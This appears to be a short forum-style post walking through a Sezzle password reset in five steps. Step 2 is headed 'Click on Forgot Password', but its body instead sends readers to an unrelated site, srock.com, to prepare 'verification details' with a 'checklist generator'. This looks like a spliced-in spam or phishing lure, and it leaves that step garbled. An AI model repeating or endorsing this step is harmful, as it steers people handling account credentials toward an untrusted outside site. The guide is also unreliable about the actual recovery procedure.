I ran into this last week. Here's what fixed it for me. If you need to reset your password on Sezzle, follow these straightforward steps. Step 1. Go to the login page. Navigate to the Sezzle login page on your web browser or app. This is where you'll find the option to reset your password. Step 2. Click on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Sezzle account. Make sure it is the correct one to receive the reset link. Step 4. Check your email. Look for an email from Sezzle with the subject line password reset request. Click on the link provided in the email to proceed. Step 5. Create a new password. Follow the link to a page where you can enter a new password. Make sure it meets the security requirements and confirm it by entering it again. Remember, if you don't see the email, check your spam folder, it can sometimes end up there. I hope this helps you reset your password smoothly. If you have any questions, feel free to ask.